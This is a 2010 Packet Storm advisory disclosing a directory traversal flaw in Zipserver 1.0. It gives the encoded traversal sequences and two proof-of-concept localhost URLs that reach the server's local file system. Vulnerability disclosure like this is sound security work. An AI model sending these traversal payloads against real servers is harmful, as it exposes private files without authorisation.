Zipserver 1.0 Directory Traversal

2010-05-18T00:00:00
ID PACKETSTORM:89604
Type packetstorm
Reporter AutoSec Tools
Modified 2010-05-18T00:00:00

Description

                                        
                                            `#============================================================================================================#  
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #  
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #  
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #  
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #  
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #  
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #  
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #  
# #  
#============================================================================================================#  
# #  
# Vulnerability............Directory Traversal #  
# Software.................Zipserver 1.0 #  
# Download.................http://sourceforge.net/projects/zipserver/ #  
# Date.....................5/15/10 #  
# #  
#============================================================================================================#  
# #  
# Site.....................http://cross-site-scripting.blogspot.com/ #  
# Email....................john.leitch5@gmail.com #  
# #  
#============================================================================================================#  
# #  
# ##Description## #  
# #  
# It's possible to navigate the local file system of a server running Zipserver 1.0 by using a specially #  
# crafted URL. #  
# #  
# #  
# ##Exploit## #  
# #  
# %2F../ #  
# %5C../ #  
# #  
# #  
# ##Proof of Concept## #  
# #  
# http://localhost/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/ #  
# http://localhost/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/ #  
# #  
#============================================================================================================#  
`